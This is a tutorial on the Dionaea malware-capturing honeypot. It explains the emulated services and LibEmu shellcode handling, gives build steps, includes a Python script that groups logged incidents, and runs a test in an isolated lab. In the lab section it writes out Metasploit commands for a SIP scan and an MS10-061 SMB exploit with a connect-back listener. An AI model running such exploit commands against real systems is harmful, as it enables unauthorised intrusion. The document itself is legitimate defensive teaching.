1. Introduction to Dionaea
Dionaea, “the Nepenthes successor”, is a malware-capturing honeypot initially developed under The Honeynet Project’s 2009 Google Summer of Code (GSoC). Dionaea aims to trap malware exploiting vulnerabilities exposed by services offered over a network, and ultimately obtain a copy of the malware.
Dionaea features a modular architecture, embedding Python as its scripting language in order to emulate protocols. Much superior to its predecessor (Nepenthes), it is able to detect shellcodes using LibEmu and supports IPv6 and TLS.
Here I’ll start off by introducing the technical background of Dionaea, before moving on to demonstrating how to set up a Dionaea honeypot and seeing it in action.
Security of Dionaea
Like any other software, Dionaea is likely to contain exploitable bugs as well. In order to minimise the impact, Dionaea runs in a restricted environment without administrative privileges.
Protocols Dionaea Traps Malware From
- Server Message Block (SMB) – SMB is the main protocol offered by Dionaea. SMB has a decent history of remotely exploitable bugs, and is a very popular target for worms.
- Hypertext Transfer Protocol (HTTP) – Dionaea supports HTTP on port 80 as well as HTTPS. A self-signed SSL certificate is created at startup for HTTPS.
- File Transfer Protocol (FTP) – Dionaea provides a basic FTP server on port 21. It allows creation of directories, and uploading and downloading of files.
- Trivial File Transfer Protocol (TFTP) – Dionaea provides a TFTP server on port 60 which can be used to serve files.
- Microsoft SQL Server (MSSQL) – Dionaea implements the Tabular Data Stream protocol which is used by Microsoft SQL Server. Listening on TCP/1433 and allowing clients to log in, it can decode queries run on the database.
- Voice over IP (VoIP) – Developed as part of GSoC 2011 by PhiBo, the VoIP protocol used in Dionaea is the Session Initiation Protocol (SIP). This module does not connect to an external VoIP registrar / server; it simply waits for incoming SIP messages, logs all data as incidents and / or binary data dumps, and reacts accordingly.
Dionaea uses LibEmu to detect and evaluate payloads sent by attackers in order to obtain a copy of the malware.
LibEmu is used to detect, measure, and if necessary, execute the shellcode. Shellcode measurement / profiling is performed by executing the shellcode in the LibEmu VM, and recording API calls and arguments. This is sufficient for profiling most shellcodes, but not for multi-stage shellcodes. In addition to recording API calls and arguments, we need to allow shellcodes to take actions (e.g. creating a network connection).
Once we have obtained the payload and its profile, we have to act upon it in order to acquire a copy of the malware. Following are some common techniques used by attackers, and how Dionaea acts upon them:
- Shell Binding / Connect Back, Exec – Dionaea offers shell emulation for payloads that offer a shell to the attacker (usually via port binding or connecting back to the attacker).
- URLDownloadToFile API – Again, Dionaea offers shell emulation and acts upon shellcodes that use the URLDownloadToFile API call to retrieve files via HTTP and execute the retrieved files afterwards.
- Multi-Stage Payloads – We’ll never know what to expect from the subsequent stage; LibEmu is used to execute the shellcode in the LibEmu VM.
To keep things simple, Dionaea offers the option to write information / logs to text files. However, as with any other service (especially honeypots), logging to text files is not a scalable solution.
In addition to that, Dionaea uses a communication system that is much superior to text logging, known as incidents. Incidents, containing information about the origin and properties of an “attack”, are passed using incident handlers (iHandlers). The LogSQL Python script is an iHandler that writes interesting incidents to a SQLite database. One advantage of using incident logging is the ability to cluster information based on the initial attack when retrieving data from the database.
On top of the local logging system, Dionaea can also be configured to send log streams to an XMPP server.
There is much more than logs to a malware-capturing honeypot such as Dionaea. Once you’ve obtained a copy of a malware, you have the option to either store the binaries locally, or submit the file to some external tools or services (e.g. CWSandbox, Norman Sandbox, VirusTotal, Anubis, etc.) for further analysis.
2. Setting Up a Dionaea Honeypot
With some idea of how Dionaea works, I will now demonstrate (step-by-step) how I set up my Dionaea honeypot on my Ubuntu 12.04.4 LTS machine.
apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
git clone git://git.carnivore.it/dionaea.git dionaea
** We will install all dependencies to /opt/dionaea.
git clone git://git.carnivore.it/liblcfg.git liblcfg
git clone git://git.carnivore.it/libemu.git libemu
tar -xvzf libev-4.04.tar.gz
tar -xvzf libpcap-1.1.1.tar.gz
Install Python 3.2.2
tar -xvzf Python-3.2.2.tgz
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 \
tar -xvzf Cython-0.16.tar.gz
/opt/dionaea/bin/python3 setup.py install
** Ensure all required dependencies are installed properly before continuing on.
make && make install
Test If Your Installation Works:
Before you put your Dionaea honeypot live on the network, you need to configure it to your environment and preference. The Dionaea configuration file – dionaea.conf – is located in the directory /opt/dionaea/etc/dionaea/.
Now, with a working Dionaea honeypot, we’ll look into how it can be used to capture and analyse malware.
3. Dionaea in Action
Before we get all excited and start attacking the newly set up Dionaea honeypot, first let’s set up an isolated network.
Here I have Dionaea set up on my Ubuntu 12.04.4 LTS machine (IP Address: 192.168.1.2), and a Debian Jessie box (IP Address 192.168.1.12) set up as my attacking machine with Metasploit and Nmap as my attacking tools.
With my isolated network set up, let’s get Dionaea up and running!
/opt/dionaea/bin/dionaea -r /opt/dionaea
Before I started attacking my Ubuntu box, I performed reconnaissance using Nmap. You should be able to see Dionaea “providing” all sorts of services. On the other end of the network, you should be able to see Dionaea picking up some traffic.
SIP Options Scan
Now, let’s perform a more specific type of scan – SIP Options Scan – using Metasploit.
/opt/metasploit/msf3/msfcli auxiliary/scanner/sip/options CHOST=192.168.1.12 CPORT=5066 RHOST=192.168.1.2 RPORT=5060 E
Looking into your Dionaea text log file, located at /opt/dionaea/var/log/dionaea.log, you will be able to investigate connection traffic and look for possible attack indicators.
Looking through the verbose text logged by Dionaea can be a pain. Alternatively, as mentioned earlier in the first section, we can view attack traffic as incidents by querying the LogSQL SQLite database, using the ReadLogSQLTree Python script provided.
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Information logged in each incident includes the exploited vulnerability, time, attacker, information about shellcodes, and files offered for download.
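Clustering by initial attack, as described for LogSQL incidents earlier, comes down to grouping rows under their root connection. The following is an added example (not part of Dionaea or the original post) that does this over an in-memory database; the table and column names are assumptions modelled on LogSQL, and all rows are constructed.

```python
import sqlite3
from collections import defaultdict

# Constructed schema and rows. Table and column names are assumptions modelled
# on the LogSQL layout; confirm them with `.schema` on your own logsql.sqlite.
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_protocol TEXT,
    connection_timestamp INTEGER, connection_root INTEGER,
    remote_host TEXT, local_port INTEGER);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY, connection INTEGER,
    download_url TEXT, download_md5_hash TEXT);
"""
PLACEHOLDER_MD5 = "0" * 32  # constructed placeholder, not a real sample hash
SAMPLE_CONNECTIONS = [
    (1, "smbd", 1400000000, 1, "192.168.1.12", 445),            # initial attack
    (2, "remoteshell", 1400000003, 1, "192.168.1.12", 4444),    # child of 1
    (3, "SipSession", 1400000100, None, "192.168.1.12", 5060),  # no root set
]
SAMPLE_DOWNLOADS = [(1, 2, "http://192.168.1.12/sample.exe", PLACEHOLDER_MD5)]

def build_sample_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO connections VALUES (?,?,?,?,?,?)", SAMPLE_CONNECTIONS)
    db.executemany("INSERT INTO downloads VALUES (?,?,?,?)", SAMPLE_DOWNLOADS)
    return db

def incidents_by_root(db):
    """Group connections and downloads under the connection that began the attack."""
    incidents = defaultdict(lambda: {"attacker": None, "protocols": [], "downloads": []})
    # A row without a root is treated as its own root.
    for conn_id, root, proto, host in db.execute(
            "SELECT connection, COALESCE(connection_root, connection), "
            "connection_protocol, remote_host FROM connections "
            "ORDER BY connection_timestamp, connection"):
        if conn_id == root:
            incidents[root]["attacker"] = host
        incidents[root]["protocols"].append(proto)
    for root, url, md5 in db.execute(
            "SELECT COALESCE(c.connection_root, c.connection), d.download_url, "
            "d.download_md5_hash FROM downloads d "
            "JOIN connections c ON c.connection = d.connection"):
        incidents[root]["downloads"].append((url, md5))
    return dict(incidents)

if __name__ == "__main__":
    for root, inc in sorted(incidents_by_root(build_sample_db()).items()):
        print(root, inc["attacker"], inc["protocols"], len(inc["downloads"]))
```

To run it against a real database, replace build_sample_db() with sqlite3.connect() on a copy of logsql.sqlite after checking the schema.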
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
We’ve seen how Dionaea reacts to service scanning. Let’s see how it fares when we include shellcodes in our attack.
Knowing that Dionaea emulates SMB service to trap malware, let’s exploit a remote code execution vulnerability that can be found in Print Spooler Service on Microsoft Windows systems (MS10-061).
/opt/metasploit/msf3/msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.1.2 EXITFUNC=process LHOST=192.168.1.12 LPORT=4444 E
Here we can see Dionaea has captured and offered a number of binaries for further analysis. These captured / downloaded binaries are made available at /opt/dionaea/var/dionaea/binaries.